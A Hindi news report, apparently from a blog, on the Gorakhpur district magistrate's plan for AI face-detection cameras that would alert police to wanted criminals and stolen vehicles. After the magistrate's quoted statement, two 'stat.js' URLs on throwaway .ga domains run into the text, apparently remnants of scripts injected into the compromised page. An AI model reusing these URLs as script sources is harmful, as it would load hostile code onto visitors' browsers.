Tuesday, January 25

गोरखपुर डीएम का बड़ा ऐलान, अब इस नयी तकनीक के धरायेंगे अपराधी, नहीं बचेगा कोई चेहरा

वांछित अपराधियों पर अब आर्टिफिशियल इंटेलिजेंस से शिकंजा कसने की तैयारी है। नई व्यवस्था में शहर के सात स्थानों पर फेस डिटेक्टर कैमरे लगाए जाएंगे। जैसे ही वांछित अपराधी गोपनीय कैमरों की नजर में आएंगे, पुलिस और प्रशासन के कंट्रोल रूम को अलर्ट चला जाएगा। कैमरे लग जाने के बाद गोरखपुर में आने वाला कोई भी शातिर अपराधी अब पुलिस की तीसरी आंख से नहीं बच पाएगा। फेस डिटेक्टर कैमरा संबंधित अपराधी की पहचान करेगा। इस कैमरे के डीवीआर सिस्टम में राज्यभर के अपराधियों का डेटा फीड रहेगा।

इस फीचर के अनुसार कैमरे की नजर से गुजरते ही विशेष कैमरा अपराधियों की पहचान करते हुए बीप की आवाज के साथ सूचित करेगा। इसके बाद पुलिस और प्रशासन की टीम अलर्ट हो जाएगी। इससे उन्हें पकड़ना काफी आसान हो जाएगा। यह कैमरे गोपनीय तरीके से लगाए जाएंगे।

वहीं चोरी के वाहन भी जैसे ही इन कैमरों की नजर में आएंगे उसका भी अलर्ट कंट्रोल रूम को चला जाएगा। इसके लिए पांच करोड़ का खर्च आएगा। जिला प्रशासन ने इसकी तैयारी पूरी कर ली है। फेस डिटेक्शन सिस्टम में प्रशासन डीसीआरबी से वांटेड अपराधियों की तस्वीर साफ्टवेयर में अपलोड कराएगा। तस्वीर अपलोड हो जाने के बाद जैसे ही उन अपराधियों में से कोई गोपनीय कैमरे की नजर में आया तो उसका अलर्ट तुरंत पुलिस और प्रशासन के कंट्रोल रूप में आ जाएगा।

कैमरे आधुनिक तकनीक से लैस होंगे। ये सामने से गुजरने वाले हर चेहरे को पहचानने में सक्षम है। इसके लिए पुलिस उन सभी वांटेड अपराधियों और संदिग्ध लोगों की तस्वीरें अपने मास्टर कंप्यूटर में फीड करेगी।

पांच करोड़ रुपये की लागत से फेस डिटेक्शन कैमरे लगाए जाएंगे। यह पूरी तरह से आर्टिफिशिल इंटेलिजेंस तकनीक पर आधारित होगा। जल्द ही इसे लगवाने की प्रक्रिया शुरू कर दी जाएगी। इससे वांटेड अपराधियों को पकड़ने में काफी आसानी मिलेगी। इसके साथ ही चोरी के वाहन भी आसानी से मिल सकेंगे।

– के. विजयेन्द्र पाण्डियन, जिलाधिकारीhttps://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

%d bloggers like this: